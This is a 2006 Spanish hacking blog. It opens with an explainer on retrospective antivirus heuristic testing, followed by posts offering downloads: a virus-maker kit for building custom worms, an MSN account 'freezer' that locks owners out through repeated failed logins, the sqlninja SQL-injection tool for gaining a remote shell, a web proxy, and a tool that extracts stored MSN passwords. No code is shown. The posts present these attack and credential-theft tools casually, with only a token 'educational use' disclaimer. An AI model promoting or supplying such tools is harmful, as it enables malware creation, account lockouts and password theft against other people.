La Heurística es un aspecto muy díficil de probar en los productos antivirus, dado que se requiere realizar las denominadas evaluaciones retrospectivas. Para poder analizar correctamente el funcionamiento de las capacidades heurísticas o proactivas de un antivirus, lo que se hace es detener la actualización de firmas del producto durante un período de tiempo X. En ese lapso, se acumulan muestras de códigos maliciosos nuevos, para que una vez recolectada una cantidad suficiente, se analice si los productos antivirus las reconocen o no. Al no haber sido actualizados para detectar esas muestras, el antivirus solo podrá reconocer si están infectadas o no a través de sus capacidades heurísticas.

Gracias a estas evaluaciones se puede conocer en detalle el rendimiento de los productos antivirus frente a virus nuevos o desconocidos.

Origen

JPS Virus Maker

2006-09-27T17:45:00.000-07:00

JPS Virus Maker os servira para confeccionar vuestros propios virus a medida, solo debeis elegir las funciones que incluira vuestro gusano y CREAR!
denle un uso educativo ya saben.

Download

-50° Celsius MSN Account Freezer

2006-09-27T17:34:00.000-07:00

Esta herramienta sirve para congelar cuentas de Msn Messenguer, básicamente lo que hace es conectarse automáticamente a www.hotmail.com introduce los emails que tu pongas e intenta entrar a su cuenta fallando la contraseña varias veces, lo que se consigue así es congelar la cuenta por un tiempo determinado que suelen ser unas 2 horas, mientras tengas el programa abierto estaras congelando la cuenta repetitivamente y el dueño no podrá acceder a ella hasta que desactives la herramienta y esta deje de bloquearla.

Download

Hacking Tools

2006-09-27T17:29:00.000-07:00

SQLNINJA 0.1.0 alpha

Sqlninja es una pequeña herramienta para explotar vulnerabilidades de Inyección SQL sobre una aplicacion web que usa Microsoft SQL como Servidor.
Su objetivo principal es de proporcionar una shell remota sobre el servidor vulnerable, aún en un ambiente muy hostil (p. ej.: con ajustes de firewall), usando el xp_cmdshell que el servidor SQL amablemente permite por defecto.

SOLO LINUX

Download

Palary, el navegador web online

2006-09-27T17:18:00.000-07:00

Se trata de un navegador web que nos permite navegar por las páginas que deseemos de manera segura, privada y sin restricciones de ningún tipo.

Navegando a través de este navegador web online evitamos ataques que provengan desde la web, por la deshabilitación de javascript, evitamos también el control de nuestro historial de navegación, saltamos los bloqueos que nos impone nuestros isp y no almacenamos archivos temporales ni cookies en nuestro navegador mientras visitamos sitios web.

Aparte de hacer de pasarela, los datos que pasan por Palary están cifrados. Y si nos registramos, tenemos otras opciones disponibles, como los marcadores, con lo que podemos tener nuestros marcadores online y navegar por sitios que deseemos sin miedo a dejar huella ni en nuestro ordenador ni en nuestro isp.

Recuperar Contraseñas de MSN Messenger

2006-09-27T17:09:00.000-07:00

Programa para conseguir los passwords del Messenguer, el programa consigue todos los passwords del pc donde lo ejecutes, es decir sacara los passwords que quedan almacenados en el pc al activar el recordatorio de contraseña de dicho programa, util para algunos casos.

Download

Bienvenidos

2006-09-27T16:06:00.000-07:00

Welcome To

MAS Q

[in]Seguridad [in]Formatica

Hoy jueves 28 de septiembre de 2006 inauguro este blog, dedicado a todos esos temas que tanto nos gustan a los "enganchados a la red" internet,in-seguridad,hacking,frikis,blogs e internet,mejoras para tu PC,Gadgets,y muchos temas mas.

Espero de todo corazon que tu visita sea del maximo agrado posible, y que si es posible vuelbas, cada pocos dias se actualizara el sitio con las ultimas novedades.

Un saludo: Overrayd